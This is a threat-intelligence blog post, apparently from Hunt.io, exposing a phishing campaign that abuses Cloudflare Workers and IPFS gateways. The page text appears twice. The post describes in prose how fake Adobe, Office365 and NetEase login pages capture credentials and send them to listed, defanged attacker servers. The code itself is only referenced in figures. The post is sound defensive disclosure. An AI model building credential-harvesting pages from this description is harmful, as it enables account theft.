One Font, Countless Frauds: Exposing Large-Scale Phishing Activity Abusing Cloudflare

Published on

Published on

Published on

Nov 7, 2024

Nov 7, 2024

Nov 7, 2024

Exposing Massive Phishing Scams Abusing Cloudflare Services
Exposing Massive Phishing Scams Abusing Cloudflare Services
Exposing Massive Phishing Scams Abusing Cloudflare Services
Exposing Massive Phishing Scams Abusing Cloudflare Services

One Font, Countless Frauds: Exposing Large-Scale Phishing Activity Abusing Cloudflare

Introduction

At Hunt, we seek to move beyond open directories and malware C2 frameworks. Our research team actively seeks out emerging threats using innovative tools like our experimental phishing crawler. Our commitment to ensuring our users and the broader security community are aware of ongoing threats led us to identify a widespread phishing campaign leveraging Cloudflare services.

What tipped us off? A shared Font Awesome kit across a massive number of websites hosting fake login pages. This discovery led us to over 60,000 links, most targeting login credentials for Microsoft's SharePoint and Office365 platforms. The campaign wasn't limited to Microsoft products; we've also encountered pages imitating DHL, Webmail Panels, and Mercari, to name a few.

In this post, we'll share some of the details of this interesting set of URLs in hopes it will help identify this threat before it hits your inbox.

What is Font Awesome?

Font Awesome is a popular library that easily integrates icons and fonts into web pages. Threat actors may find this toolkit (with over 30,000 items to choose from) valuable in tailoring the look of their phishing pages to create a sense of normalcy and trust for the user, making them less likely to suspect the phishing attempt.

Figure 1: Screenshot of Font Awesome setup page (source: https://fontawesome.com/start)

Figure 1: Screenshot of Font Awesome setup page (source: https://fontawesome.com/start)

In this case, the particular Font Awesome kit used across the cluster of phishing domains is at https://kit[.]fontawesome[.]/585b051251.js.

The script's primary purpose is to manage the kit's configuration and loading of Font Awesome icons. It includes automatic SVG fetching (which requires a license), conflict detection, handling dynamic content changes, and ensuring icons are obtained from the correct location.

Figure 2: Snippet of fontawesome-585b051251.js (source: urlscan.io)

Figure 2: Snippet of fontawesome-585b051251.js (source: urlscan.io)

Phishing Activity Details

As all the phishing domains we found are hosted on Cloudflare, it's only fitting that they use their services. In this activity set, the scammers used either Cloudflare IPFS Gateways, distributing content from a decentralized network, or Cloudflare Workers, a serverless execution environment, to mask their malicious intent. *A handful do not use either service.

Below is a quick explantion of how threat actors can abuse these services:

  • IPFS Gateways: Phishing actors can exploit IPFS gateways to host phishing content in a decentralized manner, making it potentially more challenging to track down and take down.

  • Cloudflare Workers: While a legitimate service, malicious actors can misuse Cloudflare Workers to host phishing content or other malicious scripts, potentially making them appear to originate from a trusted source (Cloudflare).

We won't attempt to analyze all 60,000+ URLs in this post. Let's dive into a few examples to understand better how these phishing actors operate.

ogukbm[.]nmbzts2qjn2150[.]workers[.]dev

The first link we will cover is hosted via CF Workers. It pretends to be an Adobe document, requiring users to enter their email credentials. The source code of the page is obfuscated by HTML character encoding. However, we can get around this by inspecting the page using the Web Developer tools.

Figure 3: Screenshot of HTML including font awesome and suspicious Javascript

Figure 3: Screenshot of HTML including font awesome and suspicious Javascript.

The arrow near the top of the page highlights the Font Awesome 585b051251 script, and the second arrow shows JavaScript code buried at the bottom of the page. This code appears to deal with login functionality. Let's take a closer look.

Figure 4: JavaScript code found in ogukbm[.]nmbzts2qjn2150[.]workers[.]dev

Figure 4: JavaScript code found in ogukbm[.]nmbzts2qjn2150[.]workers[.]dev

Below is a brief breakdown of the code in Figure 4:

  1. The code checks for a value in the URL hash and uses it to pre-fill the email field (#email) if it exists.

  2. Upon submission of the form, the code prevents the default form submission behavior, retrieves the values from the email and password fields, and then clears the password field.

  3. An error message indicates login failure, incrementing the counter (count) variable to track login attempts.

  4. After two failed attempts, the page redirects the user to the official Adobe website (line 24).

  5. Next, the code uses regex to validate that the information entered in the email field matches the basic structure of an email address.

  6. Finally, if the count variable is less than 2, the code extracts the email and password and sends an AJAX request to https://ugiuk[.]dyndns[.]dk/sign4/Adobe.php.

*At the time of writing, the URL accepting the credentials is no longer responding.

weston1.html

Figure 5: [Screenshot](https://cloudflare-ipfs[.]com/ipfs/bafybeigxf3qo3vlnjqu53wirmlp4ox6cc3gat5jkyvhra66nkwba4ajnby/weston1.html)

Figure 5: Screenshot

Our second example leverages an IPFS gateway and a seemingly innocuous HTML page ('weston1.html') consisting of a Microsoft Word document to target Office365 credentials. The page also offers a "Sign in with Other Mail" option, suggesting a wider net for potential victims.

Again, in Figure 5, identified by the arrows, are the Font Awesome script and a slightly more complex script are buried at the bottom of the page.

Figure 6: Snippet of Javascript code inside weston1.html

Figure 6: Snippet of Javascript code inside weston1.html

The above image only includes the portion of code used to send the credentials to what is likely an actor-controlled server. The actual script was a few hundred lines; I'll provide a quick overview:

  1. The script initializes a dialog box/popup window containing an embedded login image for Gmail, Outlook, AOL, Office365, Yahoo, and 'Other'.

  2. Like the first script, the code validates the email address input into the email field and sends the credentials to https://usefuxoil[.]shop/high/boloadobe.php.

  3. The code redirects the user to a URL using the domain extracted from the user's email, even if the login was unsuccessful.

biocareremedies[.]in/admin/em/mnx/

Our third and final example is an oddity among the large group of URLs identified. In the URL above, we see a domain likely spoofing some type of healthcare organization but also using India's top-level domain (TLD). The domain isn't uncommon, but the phishing page contains the title "NetEast Enterprise Email -- Login Portal," with a login field over presumably the target's LinkedIn page.

Figure 7: Screenshot of biocareremedies[.]in

Figure 7: Screenshot of biocareremedies[.]in

The login field reads, "Email login timeout, please login again." NetEase is a large free e-mail provider within China, and the page uses a similar favicon often seen on 163[.]com webpages.

Figure 8: Snippet of Javascript code for the spoofed LinkedIn page

Figure 8: Snippet of Javascript code for the spoofed LinkedIn page

A significant difference between the code in Figure 8 and the others we've looked at is that the attacker has decided not to send the credentials to additional infrastructure but to a PHP page. At the beginning of the script, a base64-encoded string (bmV4dC5waHa=), which decodes to 'next.php,' is initialized.

We can easily navigate to this page in the browser.

Figure 9: Error message at next.php

Figure 9: Error message at next.php

Conclusion

The continued rise of IPFS phishing highlights the need for security solutions that can adapt and learn. Anomaly detection tools that analyze traffic patterns and identify deviations from normal behavior offer a powerful approach to uncovering novel threats.

Sign up for Hunt today and be among the first to know when our crawler goes live. We will continue to inform the community as new phishing threats appear.

Introduction

At Hunt, we seek to move beyond open directories and malware C2 frameworks. Our research team actively seeks out emerging threats using innovative tools like our experimental phishing crawler. Our commitment to ensuring our users and the broader security community are aware of ongoing threats led us to identify a widespread phishing campaign leveraging Cloudflare services.

What tipped us off? A shared Font Awesome kit across a massive number of websites hosting fake login pages. This discovery led us to over 60,000 links, most targeting login credentials for Microsoft's SharePoint and Office365 platforms. The campaign wasn't limited to Microsoft products; we've also encountered pages imitating DHL, Webmail Panels, and Mercari, to name a few.

In this post, we'll share some of the details of this interesting set of URLs in hopes it will help identify this threat before it hits your inbox.

What is Font Awesome?

Font Awesome is a popular library that easily integrates icons and fonts into web pages. Threat actors may find this toolkit (with over 30,000 items to choose from) valuable in tailoring the look of their phishing pages to create a sense of normalcy and trust for the user, making them less likely to suspect the phishing attempt.

Figure 1: Screenshot of Font Awesome setup page (source: https://fontawesome.com/start)

Figure 1: Screenshot of Font Awesome setup page (source: https://fontawesome.com/start)

In this case, the particular Font Awesome kit used across the cluster of phishing domains is at https://kit[.]fontawesome[.]/585b051251.js.

The script's primary purpose is to manage the kit's configuration and loading of Font Awesome icons. It includes automatic SVG fetching (which requires a license), conflict detection, handling dynamic content changes, and ensuring icons are obtained from the correct location.

Figure 2: Snippet of fontawesome-585b051251.js (source: urlscan.io)

Figure 2: Snippet of fontawesome-585b051251.js (source: urlscan.io)

Phishing Activity Details

As all the phishing domains we found are hosted on Cloudflare, it's only fitting that they use their services. In this activity set, the scammers used either Cloudflare IPFS Gateways, distributing content from a decentralized network, or Cloudflare Workers, a serverless execution environment, to mask their malicious intent. *A handful do not use either service.

Below is a quick explantion of how threat actors can abuse these services:

  • IPFS Gateways: Phishing actors can exploit IPFS gateways to host phishing content in a decentralized manner, making it potentially more challenging to track down and take down.

  • Cloudflare Workers: While a legitimate service, malicious actors can misuse Cloudflare Workers to host phishing content or other malicious scripts, potentially making them appear to originate from a trusted source (Cloudflare).

We won't attempt to analyze all 60,000+ URLs in this post. Let's dive into a few examples to understand better how these phishing actors operate.

ogukbm[.]nmbzts2qjn2150[.]workers[.]dev

The first link we will cover is hosted via CF Workers. It pretends to be an Adobe document, requiring users to enter their email credentials. The source code of the page is obfuscated by HTML character encoding. However, we can get around this by inspecting the page using the Web Developer tools.

Figure 3: Screenshot of HTML including font awesome and suspicious Javascript

Figure 3: Screenshot of HTML including font awesome and suspicious Javascript.

The arrow near the top of the page highlights the Font Awesome 585b051251 script, and the second arrow shows JavaScript code buried at the bottom of the page. This code appears to deal with login functionality. Let's take a closer look.

Figure 4: JavaScript code found in ogukbm[.]nmbzts2qjn2150[.]workers[.]dev

Figure 4: JavaScript code found in ogukbm[.]nmbzts2qjn2150[.]workers[.]dev

Below is a brief breakdown of the code in Figure 4:

  1. The code checks for a value in the URL hash and uses it to pre-fill the email field (#email) if it exists.

  2. Upon submission of the form, the code prevents the default form submission behavior, retrieves the values from the email and password fields, and then clears the password field.

  3. An error message indicates login failure, incrementing the counter (count) variable to track login attempts.

  4. After two failed attempts, the page redirects the user to the official Adobe website (line 24).

  5. Next, the code uses regex to validate that the information entered in the email field matches the basic structure of an email address.

  6. Finally, if the count variable is less than 2, the code extracts the email and password and sends an AJAX request to https://ugiuk[.]dyndns[.]dk/sign4/Adobe.php.

*At the time of writing, the URL accepting the credentials is no longer responding.

weston1.html

Figure 5: [Screenshot](https://cloudflare-ipfs[.]com/ipfs/bafybeigxf3qo3vlnjqu53wirmlp4ox6cc3gat5jkyvhra66nkwba4ajnby/weston1.html)

Figure 5: Screenshot

Our second example leverages an IPFS gateway and a seemingly innocuous HTML page ('weston1.html') consisting of a Microsoft Word document to target Office365 credentials. The page also offers a "Sign in with Other Mail" option, suggesting a wider net for potential victims.

Again, in Figure 5, identified by the arrows, are the Font Awesome script and a slightly more complex script are buried at the bottom of the page.

Figure 6: Snippet of Javascript code inside weston1.html

Figure 6: Snippet of Javascript code inside weston1.html

The above image only includes the portion of code used to send the credentials to what is likely an actor-controlled server. The actual script was a few hundred lines; I'll provide a quick overview:

  1. The script initializes a dialog box/popup window containing an embedded login image for Gmail, Outlook, AOL, Office365, Yahoo, and 'Other'.

  2. Like the first script, the code validates the email address input into the email field and sends the credentials to https://usefuxoil[.]shop/high/boloadobe.php.

  3. The code redirects the user to a URL using the domain extracted from the user's email, even if the login was unsuccessful.

biocareremedies[.]in/admin/em/mnx/

Our third and final example is an oddity among the large group of URLs identified. In the URL above, we see a domain likely spoofing some type of healthcare organization but also using India's top-level domain (TLD). The domain isn't uncommon, but the phishing page contains the title "NetEast Enterprise Email -- Login Portal," with a login field over presumably the target's LinkedIn page.

Figure 7: Screenshot of biocareremedies[.]in

Figure 7: Screenshot of biocareremedies[.]in

The login field reads, "Email login timeout, please login again." NetEase is a large free e-mail provider within China, and the page uses a similar favicon often seen on 163[.]com webpages.

Figure 8: Snippet of Javascript code for the spoofed LinkedIn page

Figure 8: Snippet of Javascript code for the spoofed LinkedIn page

A significant difference between the code in Figure 8 and the others we've looked at is that the attacker has decided not to send the credentials to additional infrastructure but to a PHP page. At the beginning of the script, a base64-encoded string (bmV4dC5waHa=), which decodes to 'next.php,' is initialized.

We can easily navigate to this page in the browser.

Figure 9: Error message at next.php

Figure 9: Error message at next.php

Conclusion

The continued rise of IPFS phishing highlights the need for security solutions that can adapt and learn. Anomaly detection tools that analyze traffic patterns and identify deviations from normal behavior offer a powerful approach to uncovering novel threats.

Sign up for Hunt today and be among the first to know when our crawler goes live. We will continue to inform the community as new phishing threats appear.

Related Posts:

Introducing Hunt 2.1:  Refinements to the Threat Hunting Experience
May 21, 2025

Discover the new Hunt.io updates: deep text assisted analysis, IOC feed improvements, improved threat actor data, and faster advanced search. Learn more.

Introducing Hunt 2.1:  Refinements to the Threat Hunting Experience
May 21, 2025

Discover the new Hunt.io updates: deep text assisted analysis, IOC feed improvements, improved threat actor data, and faster advanced search. Learn more.

Shared SSH Keys Expose Phishing Infrastructure Targeting Kuwait
May 15, 2025

Shared SSH keys expose coordinated phishing targeting Kuwaiti fisheries, telecoms, and insurers with cloned login portals and mobile payment lures. Learn more.

Shared SSH Keys Expose Phishing Infrastructure Targeting Kuwait
May 15, 2025

Shared SSH keys expose coordinated phishing targeting Kuwaiti fisheries, telecoms, and insurers with cloned login portals and mobile payment lures. Learn more.

Detecting IOX, FRP, Rakshasa, and Stowaway Proxies Using Hunt.io
May 8, 2025

This post explores open-source proxy tools commonly used in attacker and red team infrastructure, and shows how defenders can detect IOX, FRP, Rakshasa, and Stowaway at scale using Hunt.io.

Detecting IOX, FRP, Rakshasa, and Stowaway Proxies Using Hunt.io
May 8, 2025

This post explores open-source proxy tools commonly used in attacker and red team infrastructure, and shows how defenders can detect IOX, FRP, Rakshasa, and Stowaway at scale using Hunt.io.

APT36-Linked ClickFix Campaign Spoofs Indian Ministry of Defence, Targets Windows & Linux Users
May 5, 2025

APT36-style phishing campaign mimics India’s Ministry of Defence to drop malware on Windows and Linux via spoofed press releases and HTA payloads.

APT36-Linked ClickFix Campaign Spoofs Indian Ministry of Defence, Targets Windows & Linux Users
May 5, 2025

APT36-style phishing campaign mimics India’s Ministry of Defence to drop malware on Windows and Linux via spoofed press releases and HTA payloads.

Introducing Hunt 2.1:  Refinements to the Threat Hunting Experience
May 21, 2025

Discover the new Hunt.io updates: deep text assisted analysis, IOC feed improvements, improved threat actor data, and faster advanced search. Learn more.

Shared SSH Keys Expose Phishing Infrastructure Targeting Kuwait
May 15, 2025

Shared SSH keys expose coordinated phishing targeting Kuwaiti fisheries, telecoms, and insurers with cloned login portals and mobile payment lures. Learn more.